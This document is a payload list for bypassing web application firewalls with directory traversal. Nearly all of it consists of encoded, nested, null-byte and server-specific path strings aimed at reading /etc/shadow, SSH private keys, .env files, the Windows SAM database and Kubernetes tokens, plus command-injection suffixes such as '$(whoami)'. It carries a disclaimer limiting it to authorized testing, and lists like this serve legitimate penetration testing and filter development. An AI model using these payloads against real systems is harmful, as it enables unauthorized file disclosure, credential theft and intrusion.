# ============================================================================
# ADVANCED WAF BYPASS PAYLOADS - DIRECTORY TRAVERSAL
# ============================================================================
# Purpose: Whitehat security testing and authorized penetration testing
# Warning: Only use on systems you have explicit permission to test
# ============================================================================

# ============================================================================
# 1. URL ENCODING VARIATIONS
# ============================================================================

# Single URL Encoding
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5cetc%5cpasswd

# Double URL Encoding
..%252f..%252f..%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd
..%255c..%255c..%255cetc%255cpasswd
%252e%252e/%252e%252e/%252e%252e/etc/passwd

# Triple URL Encoding
%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
..%25252f..%25252f..%25252fetc%25252fpasswd
%25252e%25252e%25255c%25252e%25252e%25255c%25252e%25252e%25255cetc%25255cpasswd

# Mixed Encoding (URL + Raw)
%2e%2e/..%2f../etc/passwd
../%2e%2e/%2e%2e/etc/passwd
%2e%2e\\..\\..\\etc\\passwd

# ============================================================================
# 2. UNICODE ENCODING BYPASSES
# ============================================================================

# UTF-16 Encoding
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216etc%u2216passwd
..%u2215..%u2215..%u2215etc%u2215passwd
..%u2216..%u2216..%u2216etc%u2216passwd

# Overlong UTF-8 Encoding (dots)
%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/etc/passwd

# Alternative Overlong UTF-8
%e0%40%ae%e0%40%ae%c0%af%e0%40%ae%e0%40%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd

# Mixed UTF-8 Overlong
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd
%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afpasswd

# Unicode Normalization Forms
%u00ae%u00ae%u2215%u00ae%u00ae%u2215etc%u2215passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd
%uFF0E%uFF0E%uFF0F%uFF0E%uFF0E%uFF0Fetc%uFF0Fpasswd

# ============================================================================
# 3. NESTED/RECURSIVE FILTER BYPASS
# ============================================================================

# Nested Sequences (WAF removes ../ once)
....//....//....//etc/passwd
..../\..../\..../\etc/passwd
.../.../.../.../etc/passwd
....\/....\/....\/etc/passwd
..//////..//////..//////etc/passwd
..\\\\..\\\\..\\\\etc\\passwd

# Doubled Characters
....//....//etc//passwd
.....////.....////etc////passwd
....\\\....\\\etc\\\passwd

# Interleaved Patterns
..<>/..<>/..<>/etc/passwd
..*/..*/..*//etc/passwd
..;/..; /..;/etc/passwd
...;/...;/...;/etc/passwd

# Recursive Triple
....//....//....//....//....//....//etc/passwd
..././..././..././etc/passwd
..\.\/..\.\/..\.\./etc/passwd

# ============================================================================
# 4. NULL BYTE INJECTION
# ============================================================================

# Basic Null Byte
..%00/..%00/..%00/etc/passwd
../../etc/passwd%00
../../etc/passwd%00.jpg
../../etc/passwd%00.png
../../etc/passwd%00.pdf

# Double Null Byte
..%00%00/..%00%00/..%00%00/etc/passwd
../../etc/passwd%00%00

# Null Byte with Extensions
../../etc/passwd%00.html
../../etc/passwd%00.txt
../../etc/passwd%00.log

# Complex Null Byte Patterns
./%00./.%00./etc/passwd
%00../etc/passwd
../%00../etc/passwd
../../%00etc/passwd

# Null Byte in Path Components
..%00/..%00/etc%00/passwd
../%00../%00etc/%00passwd

# ============================================================================
# 5. REVERSE PROXY & SERVER-SPECIFIC BYPASSES
# ============================================================================

# Nginx/Tomcat Discrepancy (..;/)
..;/..;/..;/etc/passwd
..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/etc/passwd
/services/pluginscript/..;/..;/..;/getFavicon
/app/..;/..;/..;/etc/passwd
/api/..;/..;/..;/etc/passwd

# IIS Unicode Normalization
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
..%c0%9v..%c0%9vetc%c0%9vpasswd

# ASP.NET Cookieless Session
/(S(X))/admin/(S(X))/../../etc/passwd
/(G(AAA-BBB)D(CCC=DDD)E(0-1))/../../etc/passwd
/(A(; ))/../../etc/passwd

# Apache ModSecurity Bypass
..%01/..%01/..%01/etc/passwd
..%0d/..%0d/..%0d/etc/passwd
..%0a/..%0a/..%0a/etc/passwd

# Trailing Slash Variations
../../etc/passwd/
../../etc/passwd//
../../etc/passwd///

# ============================================================================
# 6. CASE VARIATION & MIXED CASE
# ============================================================================

# Mixed Case Paths
../../../Etc/Passwd
../../../ETC/PASSWD
../../../eTc/pAsSwD
../../../EtC/PaSsWd

# Mixed Case with Encoding
..%2F..%2F..%2FEtc%2FPasswd
%2E%2E%2f%2E%2E%2f%2E%2E%2fETC%2fPASSWD

# Case Variation in Encoding
%2e%2e%2F%2e%2e%2F%2e%2e%2Fetc%2Fpasswd
%2E%2E%2f%2E%2E%2f%2E%2E%2fetc%2fpasswd

# ============================================================================
# 7. PATH SEPARATOR MIXING
# ============================================================================

# Forward Slash / Backslash Mix
..\/../..\/../..\/../etc/passwd
..\/..\/..\/etc/passwd
..\/..\/..\../etc/passwd
../\../\../\etc/passwd
..\\../..\\../etc/passwd

# Triple Separator Mix
.../\/.../\/.../\/etc/passwd
...\\/...\\/...\\/etc/passwd
..//\\..//\\..//\\etc/passwd

# Encoded Separator Mix
..%2f..%5c..%2fetc%2fpasswd
..%5c..%2f..%5cetc%5cpasswd
%2e%2e%2f%2e%2e%5c%2e%2e%2fetc%2fpasswd

# ============================================================================
# 8. UNC PATH INJECTION (Windows)
# ============================================================================

# UNC Localhost
\\localhost\c$\windows\win.ini
\\localhost\c$\windows\system32\drivers\etc\hosts
\\localhost\admin$\system32\config\sam
\\127.0.0.1\c$\windows\win.ini
\\.\c$\windows\win.ini

# UNC Encoded
%5c%5clocalhost%5cc$%5cwindows%5cwin.ini
%5c%5c127.0.0.1%5cc$%5cwindows%5cwin.ini
%5c%5c.%5cc$%5cwindows%5cwin.ini

# UNC with Traversal
\\localhost\c$\..\..\..\windows\win.ini
\\.\c$\..\..\windows\win.ini

# ============================================================================
# 9. ABSOLUTE PATH VARIATIONS
# ============================================================================

# Linux Absolute Paths
file:///etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/proc/self/environ
/proc/version
/proc/cmdline

# Windows Absolute Paths
c:\windows\win.ini
c:\windows\system32\drivers\etc\hosts
c:/windows/win.ini
c:/windows/system32/config/sam

# Encoded Absolute Paths
%2fetc%2fpasswd
%5cetc%5cpasswd
file:%2f%2f%2fetc%2fpasswd

# ============================================================================
# 10. PROTOCOL-BASED BYPASSES
# ============================================================================

# Java URL Protocol
url:file:///etc/passwd
url:http://127.0.0.1:8080/../../etc/passwd
jar:file:///../../etc/passwd

# File Protocol Variations
file://etc/passwd
file:///etc/passwd
file:////etc/passwd
file://../../../etc/passwd

# ============================================================================
# 11. SPECIAL CHARACTERS & WILDCARDS
# ============================================================================

# Wildcard Injection
../*/../*/etc/passwd
../../*/etc/passwd
../*/*/etc/passwd

# Special Character Injection
..;/..;/etc/passwd
..?/..?/etc/passwd
..&/..&/etc/passwd
..!/..!/etc/passwd
..~/..~/etc/passwd
..`/..`/etc/passwd

# Hash/Fragment Injection
..#/..#/etc/passwd
../../etc/passwd#
../../etc/passwd?query

# ============================================================================
# 12. WHITESPACE & NON-PRINTABLE BYPASSES
# ============================================================================

# Space Variations
..%20/..%20/etc/passwd
..%09/..%09/etc/passwd
..%0a/..%0b/etc/passwd
..%0d/..%0d/etc/passwd

# Tab Characters
..%09..%09..%09etc%09passwd

# Carriage Return / Line Feed
..%0d%0a/..%0d%0a/etc/passwd
..%0d/..%0a/etc/passwd

# ============================================================================
# 13. HYBRID ENCODING COMBINATIONS
# ============================================================================

# URL + Unicode
%2e%2e%u2215%2e%2e%u2215etc%u2215passwd
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd

# Double + Unicode
%252e%252e%u2215%252e%252e%u2215etc%u2215passwd

# URL + Null Byte
..%2f..%2f%00etc%2fpasswd
%2e%2e%2f%00%2e%2e%2fetc%2fpasswd

# Overlong UTF-8 + URL
%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fpasswd

# Mixed Everything
%c0%ae%2e%u002e%252e/%c0%ae%2e%u002e%252e/etc/passwd

# ============================================================================
# 14. DIRECTORY TRAVERSAL WITH COMMON FILES
# ============================================================================

# Linux Configuration Files
../../../etc/passwd
../../../etc/shadow
../../../etc/group
../../../etc/hosts
../../../etc/hostname
../../../etc/issue
../../../etc/motd
../../../etc/mysql/my.cnf
../../../etc/ssh/sshd_config
../../../etc/apache2/apache2.conf
../../../etc/nginx/nginx.conf
../../../root/.ssh/id_rsa
../../../root/.ssh/authorized_keys
../../../home/user/.ssh/id_rsa
../../../var/log/apache2/access.log
../../../var/log/nginx/access.log
../../../var/log/auth.log
../../../var/log/syslog
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/self/status
../../../proc/version
../../../proc/net/tcp
../../../proc/net/fib_trie

# Windows Configuration Files
../../../windows/win.ini
../../../windows/system32/drivers/etc/hosts
../../../windows/system32/config/sam
../../../windows/system32/config/system
../../../windows/repair/sam
../../../windows/repair/system
../../../boot.ini
../../../autoexec.bat
../../../config.sys
../../../inetpub/logs/LogFiles
../../../inetpub/wwwroot/web.config

# Application-Specific Files
../../../var/www/html/index.php
../../../var/www/html/.htaccess
../../../var/www/html/config.php
../../../usr/local/apache2/conf/httpd.conf
../.env
../../.env
../../../.env
../../../../.env
../../../application/config/database.php
../../../wp-config.php
../../../config/database.yml
../../../config/credentials.yml.enc

# ============================================================================
# 15. DOUBLE TRAVERSAL PATTERNS
# ============================================================================

# Extreme Nesting
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd

# Encoded Extreme Nesting
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

# ============================================================================
# 16. PARAMETER POLLUTION & INJECTION
# ============================================================================

# Parameter Injection
?file=../../etc/passwd
&file=../../etc/passwd
?path=../../etc/passwd&
?filename=../../etc/passwd
?doc=../../etc/passwd
?page=../../etc/passwd
?template=../../etc/passwd

# JSON Parameter Injection
{"file":"../../etc/passwd"}
{"path":"..\/..\/..\/etc\/passwd"}
{"filename":"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"}

# XML Injection
<file>../../etc/passwd</file>
<path>../../etc/passwd</path>

# ============================================================================
# 17. COMBINATION ATTACKS
# ============================================================================

# Multiple Techniques Combined
....//....//....//etc/passwd%00
%2e%2e%2f%2e%2e%2f%00etc%2fpasswd
..%u2215..%u2215%00etc%u2215passwd
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%00etc%2fpasswd
..;/..;/%00etc/passwd
....//....//etc/passwd%00.jpg

# Complex Hybrid
%252e%252e%u2215%c0%ae%c0%ae%2f....//etc%00/passwd
..%5c%00..%2f%c0%ae%c0%ae/etc/passwd
%2e%2e;/%2e%2e;/%00etc;/passwd

# ============================================================================
# 18. IIS SHORT NAME EXPLOITATION PAYLOADS
# ============================================================================

# IIS 8.3 Format
/secret~1/
/admin~1/
/backup~1/
/config~1.php/../../etc/passwd
/databa~1.php/../../etc/passwd

# ============================================================================
# 19. BASH/COMMAND INJECTION IN PATH TRAVERSAL
# ============================================================================

# Command Injection Attempts
../../etc/passwd;id
../../etc/passwd|whoami
../../etc/passwd`whoami`
../../etc/passwd$(whoami)
../../etc/passwd&&id
../../etc/passwd||id

# ============================================================================
# 20. CLOUD & CONTAINER SPECIFIC
# ============================================================================

# Docker/Container Escapes
../../proc/self/cgroup
../../proc/self/mountinfo
../../proc/self/mounts
../../.dockerenv
../../../../../var/run/docker.sock

# AWS Metadata
../../169.254.169.254/latest/meta-data/
../../169.254.169.254/latest/user-data/

# Kubernetes Secrets
../../var/run/secrets/kubernetes.io/serviceaccount/token
../../var/run/secrets/kubernetes.io/serviceaccount/ca.crt
../../var/run/secrets/kubernetes.io/serviceaccount/namespace

# ============================================================================
# 21. ENCODING WITH SPECIAL CHARACTERS
# ============================================================================

# Percent Encoding Edge Cases
%2e%2e%2f%2e%2e%2f%25%32%65%25%32%65%25%32%66etc%2fpasswd
%252525252e%252525252e%252525252fetc%252525252fpasswd

# HTML Entity Encoding
&period;&period;/&period;&period;/etc/passwd
&#46;&#46;/&#46;&#46;/etc/passwd
&#x2e;&#x2e;/&#x2e;&#x2e;/etc/passwd

# ============================================================================
# 22. ZIP SLIP VARIATIONS
# ============================================================================

# Zip Archive Path Traversal
../../../../../../tmp/evil.sh
../../../../../../../../tmp/evil.sh
../../../../../../../../../../../tmp/evil.sh

# ============================================================================
# END OF ADVANCED WAF BYPASS PAYLOADS
# ============================================================================
# Remember: Only use these payloads in authorized security assessments
# Always obtain proper written permission before testing
# Document all findings responsibly
# ============================================================================
